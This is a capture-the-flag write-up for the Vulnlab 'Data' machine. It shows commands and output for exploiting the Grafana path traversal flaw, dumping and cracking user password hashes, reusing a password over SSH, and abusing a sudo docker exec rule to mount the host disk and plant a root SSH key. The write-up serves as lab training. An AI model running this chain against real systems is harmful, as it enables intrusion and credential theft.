Machine details#
Machine | OS | Difficulty |
---|---|---|
Data | Linux | Easy |
Reconnaissance#
I started by executing network scans to the target to search for open ports. From the scans TCP/UDP, only two TCP ports showed up:
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
3000/tcp open ppp syn-ack ttl 62
Looking closer with a Script Scan from nmap I got the following result which helped me identify an obsolete but not so interesting OpenSSH service on port 22/TCP and an HTTP service on port 3000/TCP:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a4:b2:78:e2:2b:12:89:45:ee:77:c5:99:72:25:b3:9d (RSA)
| 256 3d:3c:50:95:39:d2:dc:14:5f:f3:6e:51:be:99:d8:45 (ECDSA)
|_ 256 6a:1f:7f:2e:80:f6:52:97:45:db:55:3e:63:da:a0:6d (ED25519)
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 10 Aug 2024 18:54:26 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 10 Aug 2024 18:53:55 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 10 Aug 2024 18:54:00 GMT
|_ Content-Length: 0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SITREP#
At this point I knew:
- 2 TCP open ports with OpenSSH and HTTP services running on.
HTTP analysis#
Reaching the HTTP service, I noted it was running Grafana and I supposed at version 8.0.0 (You can see the version statement under the login form), which is vulnerable to a path traversal vulnerability. This is funny because I personally found this same vulnerability during an assessment earlier this year, and while I was looking for more information about it, I found this very interesting blog post, as it goes beyond the “Oh my god we can dump /etc/passwd
”: https://vulncheck.com/blog/grafana-cve-2021-43798.
Initial access#
To exploit the path traversal vulnerability, a simple HTTP GET request with curl
is enough. But this time I wanted to pllay with the Python script available within the exploit-db (
https://www.exploit-db.com/exploits/50581) which I modified a bit to actually save the file.
$ python3 50581.py -H http://$IP:3000
Read file > /etc/passwd
root❌0:0:root:/root:/bin/ash
[...]
grafana❌472:0:Linux User,,,:/home/grafana:/sbin/nologin
I looked into the /etc/grafana/grafana.ini
, but nothing useful, only default and useless password. So I went for the DB available at the path /var/lib/grafana/grafana.db
.
The mod on the script actually corrupted the file, so I went for the old good curl
way.
No API keys, no auth token, no session, only my failed login attempts from the table login_attempt
and two users from user
.
$ sqlite3 grafana.db
sqlite> .tables
alert login_attempt
alert_configuration migration_log
alert_instance org
alert_notification org_user
alert_notification_state playlist
alert_rule playlist_item
alert_rule_tag plugin_setting
alert_rule_version preferences
annotation quota
annotation_tag server_lock
api_key session
cache_data short_url
dashboard star
dashboard_acl tag
dashboard_provisioning team
dashboard_snapshot team_member
dashboard_tag temp_user
dashboard_version test_data
data_source user
library_element user_auth
library_element_connection user_auth_token
Extracting the users’ info:
sqlite> select * from user;
1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0|2022-01-23 12:48:50|0
2|0|boris|[email protected]|boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl|mYl941ma8w||1|0|0||2022-01-23 12:49:11|2022-01-23 12:49:11|0|2012-01-23 12:49:11|0
Next steps will be to transform them into a readable hashcat format and crack them. The following are the parts used to crack the hashes:
admin@localhost|7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S
boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl
Be careful, because the devil is in the details: from the admin row, if you do not look closely you’ll take two ||
instead of only one, so delete one before importing them in the script code.
Cracking hashes#
Maybe you was wondering why it is hilarious for me to have found this vulnerability during an assessment. Well, it is because to transform the hashes for hashcat, I actually used the script a Vulnlab user did in the past for this machine: https://raw.githubusercontent.com/persees/grafana_exploits/main/decoder.py.
$ python3 grafana2hashcat.py
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
Then, I powered on the hashripper and launched the cracking with the following command:
$ hashcat -m 10900 grafana-hashes.txt /usr/share/wordlists/rockyou.txt -o bingo
Using rockyou without any rules and magic, I found only boris’ password: beautiful1
.
SITREP#
- I have exploited a known path traversal vulnerability on Grafana which lead to DB extraction.
- From the DB, I have dumped two users’ hashes.
- Out of two hashes, I have cracked one.
Host discovery#
After doing some password spraying, it turns out that boris is a lazy user, his password works for the SSH too:
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" boris@$IP
Once inside, the hostname intrigued me, so I decided to look for the NICs and I found out that a docker was running on this host (interface docker0
).
boris@ip-10-10-10-11:~$ ip -c a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 0a:b0:55:4e:ce:7b brd ff:ff:ff:ff:ff:ff
inet 10.10.121.232/18 brd 10.10.127.255 scope global dynamic eth0
valid_lft 3368sec preferred_lft 3368sec
inet6 fe80::8b0:55ff:fe4e:ce7b/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:95:27:66:16 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:95ff:fe27:6616/64 scope link
valid_lft forever preferred_lft forever
5: veth6197ca1@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> m
Then, it seems that boris could run /snap/bin/docker exec *
as root, this could potentially be a nice vector to gain root access:
boris@ip-10-10-10-11:~$ sudo -l
Matching Defaults entries for boris on ip-10-10-10-11:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User boris may run the following commands on ip-10-10-10-11:
(root) NOPASSWD: /snap/bin/docker exec *
To actually execute something with docker exec
, I needed a docker ID, and before interacting with Grafana, which was probably running on the docker, I took a the running processes:
boris@ip-10-10-10-11:/home/ubuntu$ ps aux | grep docker
[...]
root 1647 0.0 0.8 712860 8468 ? Sl 18:52 0:01 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
[...]
And from one row I found a candidate for the ID. Issuing the magic command, brought me into the container as root:
sudo /snap/bin/docker exec --privileged --user 0 -ti e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7 sh
/usr/share/grafana # whoami
root
Privilege escalation#
SITREP#
- I successfully got into the docker as root abusing the sudo privilege.
- Now I can escalate to root by mounting the disk.
At this point, it is pretty straightforward. I have to prepare a directory where I’ll mount the entire filesystem:
/usr/share/grafana # mkdir -p /mnt/pwned
/usr/share/grafana # ls -la /mnt
total 12
drwxr-xr-x 1 root root 4096 Aug 10 20:17 .
drwxr-xr-x 1 root root 4096 Jan 23 2022 ..
drwxr-xr-x 2 root root 4096 Aug 10 20:17 pwned
Now, I have to get the correct disk label:
/usr/share/grafana # ls -la /dev/
[...]
brw-rw---- 1 root disk 202, 1 Aug 10 18:52 xvda1
[...]
/usr/share/grafana # fdisk -l
Disk /dev/xvda: 8192 MB, 8589934592 bytes, 16777216 sectors
6367 cylinders, 85 heads, 31 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Device Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type
/dev/xvda1 * 0,32,33 20,84,31 2048 16777182 16775135 8190M 83 Linux
Finally, mount it on the directory pwned
:
/usr/share/grafana # mount /dev/xvda1 /mnt/pwned/
At this point, I have root access to the whole filesystem, meaning I can read, write, delete files from/to pretty everywhere. The first move would be checking for root’s private key, but there is not, so I added my public key in the authorized_keys
file.
/mnt/pwned/root/.ssh # ls -la
total 12
drwx------ 2 root root 4096 Jan 23 2022 .
drwx------ 7 root root 4096 Aug 10 20:26 ..
-rw------- 1 root root 653 Aug 10 20:25 authorized_keys
Then, I got into from the front door:
$ ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" root@$IP -id id_rsa
root@ip-10-10-10-11:~# whoami;hostname;cat root.txt
root
ip-10-10-10-11
VL{*-thanks-vulnlab-*}